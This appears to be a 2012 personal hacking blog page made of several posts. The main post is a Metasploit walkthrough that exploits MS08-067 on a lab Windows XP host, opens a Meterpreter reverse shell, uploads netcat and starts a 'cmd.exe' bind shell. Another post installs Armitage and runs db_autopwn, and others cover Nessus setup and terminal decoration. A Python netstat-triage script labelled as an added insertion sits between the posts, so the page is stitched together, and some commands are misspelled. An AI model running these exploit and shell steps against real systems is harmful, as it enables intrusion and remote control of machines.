Tuesday, January 31, 2012

Metasploit with Netcat


msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set PAYLOADS winodws/meterpreter/reverse_tcp
PAYLOADS => winodws/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST                     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > set RHOST 192.168.56.2
RHOST => 192.168.56.2
msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOST    192.168.56.2     yes       The target address
   RPORT    445              yes       Set the SMB service port
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 192.168.56.2
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.2:1038) at 2011-07-03 00:45:42 +0700


meterpreter > upload /root/Desktop/nc.exe c:\\
[*] uploading  : /root/Desktop/nc.exe -> c:\
[*] uploaded   : /root/Desktop/nc.exe -> c:\\nc.exe
meterpreter > shell
Process 576 created.
Channel 2 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>cd ..
cd ..

C:\WINDOWS>cd ..
cd ..

C:\>cls
cls


C:\>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 78F1-F486

 Directory of C:\

06/26/2011  12:49 AM                 0 AUTOEXEC.BAT
06/26/2011  12:49 AM                 0 CONFIG.SYS
06/26/2011  05:45 PM    <DIR>          Documents and Settings
07/03/2011  01:19 AM            59,392 nc.exe
06/26/2011  01:01 AM    <DIR>          Program Files
06/29/2011  03:31 AM    <DIR>          rain
06/29/2011  03:33 AM    <DIR>          uun
06/29/2011  12:49 AM    <DIR>          WINDOWS
               3 File(s)         59,392 bytes
               5 Dir(s)   3,695,656,960 bytes free

C:\>nc.exe
nc.exe
Cmd line:
no port[s] to connect to

C:\>nc.exe -l -p 7777 -e cmd.exe
nc.exe -l -p 7777 -e cmd.exe

[root@Novemberain][~]
[#] nc 192.168.56.2 7777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\>

C:\>netstat -an
netstat -an

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.56.2:139       0.0.0.0:0              LISTENING
  TCP    192.168.56.2:1034      192.168.56.1:4444      CLOSE_WAIT
  TCP    192.168.56.2:7777      192.168.56.1:47816     ESTABLISHED
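
A defender's reading of the `netstat -an` output above, as an added example that is not part of the original post: a small Python triage that checks each TCP row against a host baseline. The baseline listener set, the watched-port set and the function names are assumptions made for this illustration.

```python
import re

# The netstat output from the session above, embedded so the example runs offline.
SAMPLE = """\
  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:23             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1026         0.0.0.0:0              LISTENING
  TCP    192.168.56.2:139       0.0.0.0:0              LISTENING
  TCP    192.168.56.2:1034      192.168.56.1:4444      CLOSE_WAIT
  TCP    192.168.56.2:7777      192.168.56.1:47816     ESTABLISHED
"""

# Assumptions (hypothetical baseline, tune per host):
BASELINE_LISTENERS = {135, 139, 445}   # services this host is meant to expose
WATCHED_REMOTE_PORTS = {4444}          # handler port seen in the session above
EPHEMERAL = range(1025, 5001)          # Windows XP default client port range

ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$")

def parse(text):
    """Return (local_addr, local_port, remote_addr, remote_port, state) per TCP row."""
    rows = []
    for line in text.splitlines():
        m = ROW.match(line)
        if m:
            la, lp, ra, rp, st = m.groups()
            rows.append((la, int(lp), ra, int(rp), st))
    return rows

def triage(text):
    """Flag sockets that do not fit the baseline; returns (reason, endpoint) pairs."""
    findings = []
    for la, lp, ra, rp, st in parse(text):
        if st == "LISTENING":
            # Loopback-only listeners are not reachable from the network.
            if lp not in BASELINE_LISTENERS and not la.startswith("127."):
                findings.append(("unexpected-listener", f"{la}:{lp}"))
        elif rp in WATCHED_REMOTE_PORTS:
            findings.append(("watched-remote-port", f"{ra}:{rp}"))
        elif lp not in EPHEMERAL and lp not in BASELINE_LISTENERS:
            # A non-ephemeral local port means this host accepted the connection,
            # even when the listening socket is already gone (one-shot listener).
            findings.append(("inbound-to-unbaselined-port", f"{la}:{lp}"))
    return findings

if __name__ == "__main__":
    for reason, endpoint in triage(SAMPLE):
        print(f"{reason:28} {endpoint}")
```

Port 7777 has no LISTENING row in the capture, so a check that only inspects listeners would miss it; the connection row is what gives it away.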


HOW TO INSTALL NESSUS ON UBUNTU


OK, let's get started.

FIRST

1. Download the .deb file from http://www.nessus.org/products/nessus/nessus-download-agreement

Then look for the one labelled ubuntu1010_i386.deb

2. Once it has downloaded, move the .deb file to your home directory or to the Desktop (mine is on the Desktop), then go into the home directory or the Desktop, depending on where you put it ...

3. Then go into the Desktop directory and type the commands:

uun@JH:~$ cd Destop

uun@JH:~/Destop$ sudo dpkg -i Nessus-4.4.1-ubuntu1010_i386.deb
(Sedang membaca basis data ...305958 berkas dan direktori telah terpasang.)
Bersiap-siap mengganti nessus 4.4.1 (dengan Nessus-4.4.1-ubuntu1010_i386.deb) ...
$Shutting down Nessus : kill: 59: No such process

.
Sedang membuka pengganti nessus ...
Sedang menyetel nessus (4.4.1) ...

 - Please run /opt/nessus/sbin/nessus-adduser to add a user
 - Register your Nessus scanner at http://www.nessus.org/register/ to obtain
   all the newest plugins
 - You can start nessusd by typing /etc/init.d/nessusd start

Processing triggers for ureadahead ...
ureadahead will be reprofiled on next reboot

If it worked, it will look like the output above, hehe.

4. Next, register, and after registering confirm through your Yahoo e-mail: http://www.nessus.org/products/nessus/nessus-plugins/obtain-an-activation-code

Once that is done, switch to root:

[root@JH][~]
[#] /opt/nessus/sbin/nessus-adduser

Login : novemberain   <-------------- change this; you can use your own name

Login password :
Login password (again) :
Do you want this user to be a Nessus 'admin' user ? (can upload plugins, etc...) (y/n) [n]: y
User rules
----------
nessusd has a rules system which allows you to restrict the hosts
that 22021990 has the right to test. For instance, you may want
him to be able to scan his own host only.

Please see the nessus-adduser manual for the rules syntax

Enter the rules for this user, and enter a BLANK LINE once you are done :
(the user can have an empty rules set)

Login             : 22021990
Password         : ***********
This user will have 'admin' privileges within the Nessus server
Rules             :
Is that ok ? (y/n) [y] y
User added



[root@JH][~]
[#] /opt/nessus/bin/nessus-fetch --register FE61-E9C1-1A67-99B0-7569   <--------------- that is the Nessus plugins code; it will be in the e-mail in your Yahoo inbox
Your activation code has been registered properly - thank you.
Now fetching the newest plugin set from plugins.nessus.org...

7. Once that is done, just update: /etc/init.d/nessusd start

8. Now just open a browser and log in, hehe: https://127.0.0.1:8834/


Monday, January 30, 2012

HOW TO INSTALL ARMITAGE ON UBUNTU

novemberain@jh:~$ sudo apt-get install armitage
novemberain@jh:~$ sudo apt-get install postgresql
novemberain@jh:~$ sudo apt-get install libpgsql-ruby
novemberain@jh:~$ sudo su postgres

Now we configure the database:

postgres@jh:~$ createuser novemberain -P
Enter password for new role:
Enter it again:
Shall the new role be a superuser? (y/n) n
Shall the new role be allowed to create databases? (y/n) n
Shall the new role be allowed to create more new roles? (y/n) n
postgres@jh:~$ createdb --owner=novemberain metasploit3
postgres@jh:~$ exit

Next, start msfconsole; once you are in, configure it inside msf:

msf > db_driver postgresql
msf > db_connect novemberain:password@127.0.0.1:5432/metasploit3
msf > db_workspace -a MyProject

And here is Autopwn:

msf > db_nmap 192.168.1.1
msf > db_autopwn -p -e -q

When that is finished, let's set up auto-start, so that when we log in to the laptop or computer and open Armitage, everything is already there and ready to use, hehe.

novemberain@jh:~$ cat > ~/.msf3/msfconsole.rc

then enter:

db_driver postgresql
db_connect novemberain:[password]@127.0.0.1:5432/metasploit3
db_workspace -a MyProject

save with ctrl+s

Once that is done, update msf first:

novemberain@jh:~$ sudo msfupdate

Then open Armitage from the terminal:

novemberain@jh:~$ cd /pentest/exploits/armitage/

Once you are in that directory, just type ./armitage.sh and Armitage will come up.

Then open one more terminal:

novemberain@jh:~$ msfrpcd -f -U msf -P test -t Basic

HOW TO BEAUTIFY THE LINUX TERMINAL

Cowsay (or cowthink) is an application that turns plain text into a speech balloon spoken by a cute ASCII-art cow in the terminal window.

Figlet (Frank, Ian and Glenn's Letters) is an application that renders text in special, distinctive large characters on the console or in the terminal window.


install figlet
novemberain@Tux-family:~$ sudo apt-get install figlet
[sudo] password for novemberain:
Reading package lists... Done
Building dependency tree      
Reading state information... Done
figlet is already the newest version.
The following packages were automatically installed and are no longer required:
  bamfdaemon python-nltk python-lxml libyaml-0-2 python-scapy python-yaml libbamf0
Use 'apt-get autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 9 not upgraded. <----- already installed


Second ... install cowsay
novemberain@Tux-family:~$ sudo apt-get install cowsay
Reading package lists... Done
Building dependency tree      
Reading state information... Done
cowsay is already the newest version.
The following packages were automatically installed and are no longer required:
  bamfdaemon python-nltk python-lxml libyaml-0-2 python-scapy python-yaml libbamf0
Use 'apt-get autoremove' to remove them.
0 upgraded, 0 newly installed, 0 to remove and 9 not upgraded. <---- already installed


Once both are installed, open a terminal and type ...

novemberain@Tux-family:~$ sudo gedit .bashrc
it will then look like the picture below ..


Then put the following script at the very bottom; edit the script first, and when you are done, save:
fi
# Modification Terminal
cowsay -f dragon "SELAMAT DATANG DI TUX-FAMILY INDONESIAN"
echo
#Figlet nama
figlet -f smslant "NOVEMBER RAIN"
Notes:
cowsay -f DRAGON <-------- can be replaced with any picture ....
"SELAMAT DATANG DI TUX-FAMILY INDONESIAN" <---- can be replaced with any words ...
figlet -f smslant "NOVEMBER RAIN" <----------- change the name to whatever you like :)
and it will look like the picture of my Linux terminal

If you want to change the picture, look here ...
novemberain@Tux-family:~$ cd /usr/share/cowsay/cows/
novemberain@Tux-family:/usr/share/cowsay/cows$ ls
apt.cow         cock.cow            elephant.cow           hellokitty.cow    meow.cow       skeleton.cow         turkey.cow
beavis.zen.cow  cower.cow           elephant-in-snake.cow  kiss.cow          milk.cow       snowman.cow          turtle.cow
bong.cow        daemon.cow          eyes.cow               kitty.cow         moofasa.cow    sodomized-sheep.cow  tux.cow
bud-frogs.cow   default.cow         flaming-sheep.cow      koala.cow         moose.cow      stegosaurus.cow      vader.cow
bunny.cow       dragon-and-cow.cow  ghostbusters.cow       kosh.cow          mutilated.cow  stimpy.cow           vader-koala.cow
calvin.cow      dragon.cow          gnu.cow                luke-koala.cow    ren.cow        suse.cow             www.cow
cheese.cow      duck.cow            head-in.cow            mech-and-cow.cow  sheep.cow      three-eyes.cow





Now just pick whichever one you like ... as the picture in your terminal ....
OK, that's all for now .... good luck trying it out :)